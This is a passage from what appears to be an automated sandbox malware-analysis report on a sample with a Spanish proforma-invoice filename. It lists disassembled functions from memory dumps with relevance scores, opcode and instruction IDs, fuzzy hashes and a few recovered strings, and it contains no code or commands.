                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54cafe6d6701228948bc11a9d2703158e024f63a549be75c758a76ba38569cac
                                                  • Instruction ID: 241c610919145f8bc200a0882c53d49f493194a1c780be6da8491f01d8ac2642
                                                  • Opcode Fuzzy Hash: 54cafe6d6701228948bc11a9d2703158e024f63a549be75c758a76ba38569cac
                                                  • Instruction Fuzzy Hash: 71811F75A00305ABEF11DFA5CC84EAFBBF8EF48750F504529E625AB290DB70A904CB95
                                                  Function 36737623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02492f0900d943382c9d7d8b7fcddc9e95f0afe573c88c459b7dfe991050db0a
                                                  • Instruction ID: daf85bb6df04b9862d334550fe3af282954617a746c65fdcccf6f9088cbdcdfc
                                                  • Opcode Fuzzy Hash: 02492f0900d943382c9d7d8b7fcddc9e95f0afe573c88c459b7dfe991050db0a
                                                  • Instruction Fuzzy Hash: C5618275A01606EFDB08CF68C884AADFBB6FB48344F64826AD519AB341DB3069518FD4
                                                  Function 3673254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 7ba2bf33f186c7de3f59f07b8e76f56f69f82faf458b3eecdb12e6d2d15ebe43
                                                  • Instruction ID: d0b213ef9085b914f9418b2440673ebdecb6df17434d39232307d444b1c751bc
                                                  • Opcode Fuzzy Hash: 7ba2bf33f186c7de3f59f07b8e76f56f69f82faf458b3eecdb12e6d2d15ebe43
                                                  • Instruction Fuzzy Hash: 94418F75902704CFD711DF24C954B59B7B2FF49354FB0829AC2269F692EB30AA81CB86
                                                  Function 367B0443 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 730251264304b290cd2a32e0ba43b15daaa51cab33db033c941b506d2155d5be
                                                  • Instruction ID: 716a4cd1290f0d8daf16185b021b23d9299cee09e7230b57f3f0ff3560dd77f0
                                                  • Opcode Fuzzy Hash: 730251264304b290cd2a32e0ba43b15daaa51cab33db033c941b506d2155d5be
                                                  • Instruction Fuzzy Hash: BC41A0715183009FD760CF29C844B9BBBE8FF88754F408A2AFA98DB290D730D945CB92
                                                  Function 36734779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 1c92ee9425119e00cebdd9174a44dd3443bf027f07c98847a727f6d1316cfd2c
                                                  • Instruction ID: 743e1c6efa80d7bfa33d09a5abaa0db9e16e666346fe0da4f27d0f599502d4bc
                                                  • Opcode Fuzzy Hash: 1c92ee9425119e00cebdd9174a44dd3443bf027f07c98847a727f6d1316cfd2c
                                                  • Instruction Fuzzy Hash: A0410574A113418FE319CF29C894B7A77E6FF84350FA0442DE6418F2A2DB30D891CAE1
                                                  Function 3672B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 071d23bb49637a6de26005a35a171125767f56511f697d57ec16ab9eab51073c
                                                  • Instruction ID: bd9f98049965ebf153cbaa8ab242a47f2f8edd575fb2aedf33ad8dd284c26caf
                                                  • Opcode Fuzzy Hash: 071d23bb49637a6de26005a35a171125767f56511f697d57ec16ab9eab51073c
                                                  • Instruction Fuzzy Hash: 7E3135729002049FD711DF14C888E6677B6FF45B68F908269EE545F291CB31ED42CBD0
                                                  Function 367356E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: ea8e97e6db43f9405664c8b4f9c60c7245dd5e1e7431bc1d27a6442ce139b0b2
                                                  • Instruction ID: d0d70910ce702b7d4d4806da4d99c08094e7cd64924065e770b75aa396916844
                                                  • Opcode Fuzzy Hash: ea8e97e6db43f9405664c8b4f9c60c7245dd5e1e7431bc1d27a6442ce139b0b2
                                                  • Instruction Fuzzy Hash: 6231C335622A15FFE7429B24DE44A99BBA6FF88354F909059E9008BA51DB31E830CFC1
                                                  Function 367DE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 53bdd425b1ecbc78aabace086d053d8d325487f96aaf96af177915ebc6542f71
                                                  • Instruction ID: 9947489b1e0ab4a41ff397af6fbcbe9fb821d7ebf6a6e848d8f3a0d545e4c2c0
                                                  • Opcode Fuzzy Hash: 53bdd425b1ecbc78aabace086d053d8d325487f96aaf96af177915ebc6542f71
                                                  • Instruction Fuzzy Hash: D63178B5928301DFC702DF19C44495ABBF2FF89654F9499AEE4889F201D331DD85CB92
                                                  Function 36733536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: b50f120e025838317e07609abf06aa864a4e0fd2a9d2d8c1e7f2a7f539531ea1
                                                  • Instruction ID: da471595e805a99c4cb1632a22003001d4869b401127126cae410ba394bed72c
                                                  • Opcode Fuzzy Hash: b50f120e025838317e07609abf06aa864a4e0fd2a9d2d8c1e7f2a7f539531ea1
                                                  • Instruction Fuzzy Hash: 002105355166809FD7329F15C948B2A7BA2EF84B20FE40169E8514F242C770ECD8CBC2
                                                  Function 367292AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 4a61f40b43e97767190696a0e65530cb56d0c95cbabe0eaf6e335e1303d96259
                                                  • Instruction ID: 13e45a9879a86fab918ce676acc0daf3a695762aa878a86a049d961a48026cbb
                                                  • Opcode Fuzzy Hash: 4a61f40b43e97767190696a0e65530cb56d0c95cbabe0eaf6e335e1303d96259
                                                  • Instruction Fuzzy Hash: C0F0F032100600AFD731DB1ACC08F9ABBEEEF84B10F58011DA64697091D7A0E905C660
                                                  Function 36443C5A Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 4d26e6b951dab44ec77754aa75a065a7067f517d9ca21e84e9235853cf09bec1
                                                  • Instruction ID: d47fe3b59e8ab89bafb28871e0c0a11e50822fd408d8a174c8d5e46df87c3c94
                                                  • Opcode Fuzzy Hash: 4d26e6b951dab44ec77754aa75a065a7067f517d9ca21e84e9235853cf09bec1
                                                  • Instruction Fuzzy Hash: E291EC7060C7848FE7A6DB2DC491B6ABBE2FBD9344F50496DA1D9C3361EA34D845CB02
                                                  Function 36443619 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: d5a83c74e67d5090bf2d43ffd9e9890866722d7c08d50a09b0f38d9b07b4b327
                                                  • Instruction ID: 7bf781a1e44d92e0e533baf4bb005e8144d951f164f5b6c9d9bf3620764a8be4
                                                  • Opcode Fuzzy Hash: d5a83c74e67d5090bf2d43ffd9e9890866722d7c08d50a09b0f38d9b07b4b327
                                                  • Instruction Fuzzy Hash: 2691E97060CB848FE7A6EB2DC451B6ABBE1BBD8304F50496DE1D9C3361EA34D845CB42
                                                  Function 36443944 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84425845160.0000000036430000.00000040.00001000.00020000.00000000.sdmp, Offset: 36430000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36430000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: i
                                                  • API String ID: 0-3865851505
                                                  • Opcode ID: b4236c0dce63cd06311cbbaabeaa68f3e1edbf51c8edf3d16c5c41868e2c45e0
                                                  • Instruction ID: 1c650d1adeb5bdc5986a624060edde251a7ff4cd9020b24328b3b5d16244cbfa
                                                  • Opcode Fuzzy Hash: b4236c0dce63cd06311cbbaabeaa68f3e1edbf51c8edf3d16c5c41868e2c45e0
                                                  • Instruction Fuzzy Hash: 0991FC3060CB848FE7A6EB2DC455B6ABBE1FBD8345F50496DA1D9C3361EA34D845CB02
                                                  Function 3676A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalTags
                                                  • API String ID: 0-1106856819
                                                  • Opcode ID: 293a81c7a6b424227b1798df13a1529570ad57910f5d7b177889aa0f2e366ee1
                                                  • Instruction ID: 17ad6d592204b98cdd78fc4d9adb0853663578455ce754b58dd4a8de4c9cc9e4
                                                  • Opcode Fuzzy Hash: 293a81c7a6b424227b1798df13a1529570ad57910f5d7b177889aa0f2e366ee1
                                                  • Instruction Fuzzy Hash: 6571A1B5E00319DFEB24CF99C5906EDBBB2BF48350F90822AE905AB345EB308951CB50
                                                  Function 3673965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                  • Instruction ID: afb72f42461cd7993ed4522753427dd4e02e3b7ef7fa3fa20a23226483c448a8
                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                  • Instruction Fuzzy Hash: 80616B75D02219ABEB11DF95D844BEEBBF5EF44754FA04169E920BB290EB708901CBD0
                                                  Function 367402F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #%u
                                                  • API String ID: 0-232158463
                                                  • Opcode ID: 83ef00ce8fd873dba7005982eb1727ec7e4d0dbdd988f59cf0e4c62dbef9dc90
                                                  • Instruction ID: 209c84e73a7ed9cb0bd50f726b5b67654b4d7b875f89f6af771c8ceb66f121c2
                                                  • Opcode Fuzzy Hash: 83ef00ce8fd873dba7005982eb1727ec7e4d0dbdd988f59cf0e4c62dbef9dc90
                                                  • Instruction Fuzzy Hash: 2A716E71A00209DFDB01DFA9D988FAEBBF9EF08704F544165E904EB255EB34E901CB61
                                                  Function 367BF42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                  • Instruction ID: c977fbb56f1f386467687a274d98541fbe7289345d1cc7e59f1fd2d6492a25d3
                                                  • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                  • Instruction Fuzzy Hash: 4051EF72504701AFEB128F65CC84F6BB7E8FF44B54F804929FA409B290EB78D905CB92
                                                  Function 3674E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: EXT-
                                                  • API String ID: 0-1948896318
                                                  • Opcode ID: 281baca86ecb2ac7f4dc52d09f9d0701daaeab2730d4ab1ecc680fbdb6e13396
                                                  • Instruction ID: e08f3783c2b9dde0bbe3b70fdb90c6f155a03263e6d6f5d845cbfb1482669fba
                                                  • Opcode Fuzzy Hash: 281baca86ecb2ac7f4dc52d09f9d0701daaeab2730d4ab1ecc680fbdb6e13396
                                                  • Instruction Fuzzy Hash: CF4182719293119BE712EA65C848B6FB7D8AF88764FC0492DF684DF140EB74C904C793
                                                  Function 367AC3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryHash
                                                  • API String ID: 0-2202222882
                                                  • Opcode ID: 7c86f868f9daaf829c2fc1adf098f64dd810a8ebb25260b8eb047feaf20b5cc0
                                                  • Instruction ID: 31e47218dc31eb6da94a6b23dd04b166516f8adb4d48019e5b293d7c1e2282fe
                                                  • Opcode Fuzzy Hash: 7c86f868f9daaf829c2fc1adf098f64dd810a8ebb25260b8eb047feaf20b5cc0
                                                  • Instruction Fuzzy Hash: 274133B190062CAADB21DA54CC84FEE777CAF45714F9045E5A718AF240DB309E888FA9
                                                  Function 367307A7 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-1187924473
                                                  • Opcode ID: 07acacaa93d87be7000118c716b7ffde26806111ef41a08528d48433796888a7
                                                  • Instruction ID: faac3bd1b3c8570686509183bf15e44b7534d7ae1f668ca9d4dfad056cddbaaf
                                                  • Opcode Fuzzy Hash: 07acacaa93d87be7000118c716b7ffde26806111ef41a08528d48433796888a7
                                                  • Instruction Fuzzy Hash: BA41D670612701DFE724CF29C884A62B7F6FF48304BA0896DD5968FA52EB30E855CBD1
                                                  Function 367B9429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: verifier.dll
                                                  • API String ID: 0-3265496382
                                                  • Opcode ID: 3c4e244158754447e0ffb5bdc6595d952b52a91b7e771c32edce7860e58c5552
                                                  • Instruction ID: adc5aafa43b5a9fc47177e058761c5594875307565186252efab4ea383c97cb5
                                                  • Opcode Fuzzy Hash: 3c4e244158754447e0ffb5bdc6595d952b52a91b7e771c32edce7860e58c5552
                                                  • Instruction Fuzzy Hash: 1E31B3B5A50201AFEB148F69D850B3677E6EB4A754FE0802AE618DF3C1EA318D81C755
                                                  Function 36767425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                  • Instruction ID: 231b744e577249adbd11343d33f6c0c8ec34c02cfdbdbf8fc7a0851bf4a91d79
                                                  • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                  • Instruction Fuzzy Hash: AE41D275A00715DBEB15CF89C888BBEBBB5EF40789F90415AED449F200DB709841CBE1
                                                  Function 3676360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Flst
                                                  • API String ID: 0-2374792617
                                                  • Opcode ID: 9c015bfda0790adf664f289e95634a785940b70fbea9c51bddab28292d913316
                                                  • Instruction ID: 0e4314184e518e12bfbdeac78a714114f8fab0b69bea520ea372781af38ac690
                                                  • Opcode Fuzzy Hash: 9c015bfda0790adf664f289e95634a785940b70fbea9c51bddab28292d913316
                                                  • Instruction Fuzzy Hash: 3341CDB0605301DFE304CF1AC584616FBE5EF49728F94826EE9589F381EB71D846CB96
                                                  Function 367AC6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: 5194b238b2547c7f8debe3f26dcea9f071814b55014d3a906245ea7517428dc8
                                                  • Instruction ID: a1bd7d654989b947e90c2cba716ffbbeacc72dc9491c5322e38ec9ca57b07dd6
                                                  • Opcode Fuzzy Hash: 5194b238b2547c7f8debe3f26dcea9f071814b55014d3a906245ea7517428dc8
                                                  • Instruction Fuzzy Hash: A431D17A900719BFEB16CA5DC845E6BB775EF82720F918229E910AF350DB309E04C7E1
                                                  Function 36742760 Relevance: .6, Instructions: 605COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be9271a543399cce788ddc454e0c4179601f3e5412e48423f522f876457ab610
                                                  • Instruction ID: 285800f7779dff3718548bfaab5a653cef6d545b29a89b70bad4efcaafa8fa4a
                                                  • Opcode Fuzzy Hash: be9271a543399cce788ddc454e0c4179601f3e5412e48423f522f876457ab610
                                                  • Instruction Fuzzy Hash: B032EE74A007648FFB24CFA6C854BBEB7F2AF84744FA08219D5459F284DB35A862CF51
                                                  Function 367F124C Relevance: .6, Instructions: 571COMMON
